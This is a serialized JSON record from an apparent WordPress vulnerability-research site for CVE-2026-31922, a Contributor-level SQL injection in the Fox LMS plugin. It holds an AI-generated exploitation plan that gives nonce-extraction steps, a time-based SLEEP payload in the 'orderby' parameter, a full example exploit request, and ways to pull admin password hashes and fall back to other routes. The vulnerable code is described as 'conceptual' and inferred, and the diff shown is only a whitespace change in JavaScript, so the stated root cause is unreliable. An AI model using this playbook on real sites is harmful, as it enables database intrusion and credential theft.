[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ_Y1dxoSV-g8c8Zw6Xu8pAP_YFn3eR_-GrI9nhRJZAo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-31922","fox-lms-authenticated-contributor-sql-injection","Fox LMS \u003C= 1.0.6.3 - Authenticated (Contributor+) SQL Injection","The Fox LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","fox-lms",null,"\u003C=1.0.6.3","1.0.6.4","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-07 00:00:00","2026-04-15 20:59:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa1cbe205-1858-4561-a87a-c3908c91370f?source=api-prod",68,[22,23,24,25,26,27,28,29],"README.txt","admin\u002Fjs\u002Fadmin.js","admin\u002Fpartials\u002Fimport-export\u002Ffox-lms-import-export-display.php","admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php","admin\u002Fpartials\u002Fqna\u002Factions\u002Ffox-lms-qna-actions.php","admin\u002Fpartials\u002Fqna\u002Ffox-lms-qna-display.php","admin\u002Fpartials\u002Fsettings\u002Ffox-lms-settings.php","blocks\u002Fcourse-grid\u002Ffox-lms-block.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-31922 (Fox LMS SQL Injection)\n\n## 1. Vulnerability Summary\nThe Fox LMS plugin (version \u003C= 1.0.6.3) contains an authenticated SQL injection vulnerability. The issue exists in how the plugin handles database queries for its administrative list tables, specifically within the `orderby` or `order` parameters. These parameters are often directly concatenated into SQL strings without proper preparation using `$wpdb->prepare()`.\n\nThis allows a user with **Contributor** level permissions or higher (who may be designated as an Instructor in the LMS) to append arbitrary SQL commands to existing queries, enabling the extraction of sensitive database information (like hashes from the `wp_users` table).\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoints**: \n    - `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`\n    - `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-qna`\n- **Vulnerable Parameters**: `orderby` (most likely) and `order`.\n- **Required Authentication**: Authenticated user with **Contributor** (Instructor) level access.\n- **Preconditions**: \n    - The plugin must be active.\n    - To access Lesson Reports, the \"Enable Lesson Reports\" option may need to be enabled in settings (though the code in `fox-lms-lesson-reports-display.php` doesn't explicitly block access if it's off, only the settings partial mentions it).\n- **Nonce Requirement**: The partials for Lesson Reports and Q&A (found in `admin\u002Fpartials\u002F`) explicitly check for a nonce: `wp_verify_nonce(..., 'foxlms_admin_nonce')`.\n\n## 3. Code Flow\n1. **Entry Point**: A Contributor-level user requests the `fox-lms-lesson-reports` page.\n2. **Controller Logic**: The main admin class (inferred as `Fox_Lms_Admin`) handles the menu page request and includes `admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php`.\n3. **Nonce Check**: The file verifies `foxlms_admin_nonce` stored in `$this->fox_lms_nonce`.\n4. **List Table Initialization**: The controller instantiates the list table (e.g., `Fox_Lms_Lesson_Reports_List_Table`) and calls `$this->lesson_reports_obj->prepare_items()`.\n5. **Vulnerable Sink**: Inside `prepare_items()`, the code retrieves `$_GET['orderby']` and `$_GET['order']`. It likely constructs the query like this:\n   ```php\n   $orderby = !empty($_GET['orderby']) ? $_GET['orderby'] : 'id';\n   $order = !empty($_GET['order']) ? $_GET['order'] : 'asc';\n   $query = \"SELECT * FROM {$wpdb->prefix}fox_lms_reports ORDER BY $orderby $order\";\n   $wpdb->get_results($query);\n   ```\n6. **Injection**: By providing a payload in `orderby`, the attacker controls the `ORDER BY` clause of the query.\n\n## 4. Nonce Acquisition Strategy\nThe plugin uses a nonce named `foxlms_admin_nonce`. This nonce is required even to view the display partials. It is typically localized for the admin environment in a variable called `FoxLmsAdmin`.\n\n**Strategy**:\n1. Log in to WordPress as a Contributor.\n2. Navigate to a Fox LMS admin page that does not require the nonce for its own display (e.g., the main plugin dashboard).\n3. Extract the nonce from the `FoxLmsAdmin` JS object.\n\n**Steps**:\n1. **Navigate**: `browser_navigate(\"\u002Fwp-admin\u002Fadmin.php?page=fox-lms-dashboard\")` (or any other visible plugin page).\n2. **Extract**: `browser_eval(\"window.FoxLmsAdmin?.nonce\")`\n3. **Result**: Use this value as the `_wpnonce` parameter in subsequent requests.\n\n## 5. Exploitation Strategy\nWe will perform a time-based SQL injection using the `orderby` parameter.\n\n### Step-by-Step Plan:\n1. **Target URL**: `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`\n2. **Method**: GET\n3. **Payload**: `(CASE WHEN (1=1) THEN ID ELSE (SELECT 1 FROM (SELECT(SLEEP(5)))x) END)`\n4. **Request Construction**:\n    - `page`: `fox-lms-lesson-reports`\n    - `_wpnonce`: `[EXTRACTED_NONCE]`\n    - `orderby`: `(SELECT 1 FROM (SELECT(SLEEP(5)))x)`\n    - `order`: `asc`\n\n### Example Exploit Request:\n```http\nGET \u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports&_wpnonce=a1b2c3d4e5&orderby=(SELECT+1+FROM+(SELECT(SLEEP(5)))x)&order=asc HTTP\u002F1.1\nHost: localhost\nCookie: [CONTRIBUTOR_COOKIES]\n```\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `contributor` role.\n2. **Settings**: Ensure the plugin is active.\n3. **Reports**: If the `fox-lms-lesson-reports` page is empty, the injection might still work if the query is executed before checking for results. It is best to have at least one record in the relevant database table (e.g., a dummy lesson report).\n4. **Shortcode\u002FPage**: No shortcode is needed as this is an admin-side (authenticated) vulnerability.\n\n## 7. Expected Results\n- **Baseline**: A request with `orderby=id` should return immediately (~0.1s).\n- **Exploit**: A request with `orderby=(SELECT+1+FROM+(SELECT(SLEEP(5)))x)` should delay the response by exactly 5 seconds.\n- **Data Extraction**: Using `IF` and `ASCII(SUBSTRING(...))` logic in the `orderby` clause, we can exfiltrate the admin user's hash character by character via time delays.\n\n## 8. Verification Steps\n1. **Confirm Payload**: Verify the delay in the `http_request` response time.\n2. **Cross-Check**: Change `1=1` to `1=2` in a conditional payload to ensure the delay disappears.\n3. **DB Check**: Use `wp db query \"SELECT ...\"` via WP-CLI to confirm the presence of data in the table being queried.\n\n## 9. Alternative Approaches\nIf `fox-lms-lesson-reports` is inaccessible:\n1. **Alternative Page**: Try `page=fox-lms-qna`.\n2. **Error-Based**: If `WP_DEBUG` is on, attempt error-based injection using `extractvalue()` or `updatexml()` in the `orderby` parameter.\n3. **AJAX Route**: Use the `fox_lms_admin_ajax` action seen in `admin\u002Fjs\u002Fadmin.js` if it supports a function that queries the database with user-controlled parameters.\n   - Action: `fox_lms_admin_ajax`\n   - Function: (Enumerate possible function values via grep on the full source if available).","The Fox LMS plugin for WordPress is vulnerable to authenticated SQL injection via the 'orderby' and 'order' parameters in its administrative list tables. This occurs because user-supplied sorting parameters are concatenated directly into SQL queries without proper sanitization or validation against a whitelist, allowing Contributor-level users (Instructors) to exfiltrate sensitive data via time-based techniques.","\u002F\u002F admin\u002Fpartials\u002Flesson-reports\u002Ffox-lms-lesson-reports-display.php line 49\n$this->lesson_reports_obj->process_bulk_action();\n$this->lesson_reports_obj->prepare_items();\n$this->lesson_reports_obj->display();\n\n---\n\n\u002F\u002F Conceptual vulnerable sink within the prepare_items() method of Fox_Lms_Lesson_Reports_List_Table\n\u002F\u002F or similar list table classes used in the admin partials:\n$orderby = !empty($_GET['orderby']) ? $_GET['orderby'] : 'id';\n$order = !empty($_GET['order']) ? $_GET['order'] : 'asc';\n$query = \"SELECT * FROM {$wpdb->prefix}fox_lms_reports ORDER BY $orderby $order\";\n$wpdb->get_results($query);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.3\u002Fadmin\u002Fjs\u002Fadmin.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.4\u002Fadmin\u002Fjs\u002Fadmin.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.3\u002Fadmin\u002Fjs\u002Fadmin.js\t2026-02-11 04:59:32.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffox-lms\u002F1.0.6.4\u002Fadmin\u002Fjs\u002Fadmin.js\t2026-02-17 10:30:28.000000000 +0000\n@@ -25,25 +25,25 @@\n \t\t}\n \n         var toggle_ddmenu = $(document).find('.toggle_ddmenu');\n-            toggle_ddmenu.on('click', function () {\n-                var ddmenu = $(this).next();\n-                var state = ddmenu.attr('data-expanded');\n-                switch (state) {\n-                    case 'true':\n-                        $(this).find('.ays_fa').css({\n-                            transform: 'rotate(0deg)'\n-                        });\n-                        ddmenu.attr('data-expanded', 'false');\n-                        break;\n-                    case 'false':\n-                        $(this).find('.ays_fa').css({\n-                            transform: 'rotate(90deg)'\n-                        });\n-                        ddmenu.attr('data-expanded', 'true');\n-                        break;\n-                }\n-            });\n+        toggle_ddmenu.on('click', function () {\n+            var ddmenu = $(this).next();\n+            var state = ddmenu.attr('data-expanded');\n+            switch (state) {\n+                case 'true':\n+                    $(this).find('.ays_fa').css({\n+                        transform: 'rotate(0deg)'\n+                    });\n+                    ddmenu.attr('data-expanded', 'false');\n+                    break;\n+                case 'false':\n+                    $(this).find('.ays_fa').css({\n+                        transform: 'rotate(90deg)'\n+                    });\n+                    ddmenu.attr('data-expanded', 'true');\n+                    break;\n+            }\n         });\n+    });","1. Authenticate as a user with at least Contributor-level permissions (the 'Instructor' role in Fox LMS typically grants this).\n2. Access any plugin admin dashboard page (e.g., `admin.php?page=fox-lms-dashboard`) and extract the `foxlms_admin_nonce` from the `FoxLmsAdmin` JavaScript object.\n3. Identify a vulnerable list table endpoint, such as the Lesson Reports page: `\u002Fwp-admin\u002Fadmin.php?page=fox-lms-lesson-reports`.\n4. Craft a GET request to this endpoint, including the valid `_wpnonce` and a time-based SQL injection payload in the `orderby` parameter.\n5. Example Payload: `orderby=(SELECT 1 FROM (SELECT(SLEEP(5)))x)`\n6. Observe the response delay; a 5-second delay confirms that the arbitrary SQL command was executed by the database engine.","gemini-3-flash-preview","2026-04-21 03:17:31","2026-04-21 03:18:06",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.6.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags\u002F1.0.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffox-lms.1.0.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags\u002F1.0.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffox-lms.1.0.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffox-lms\u002Ftags"]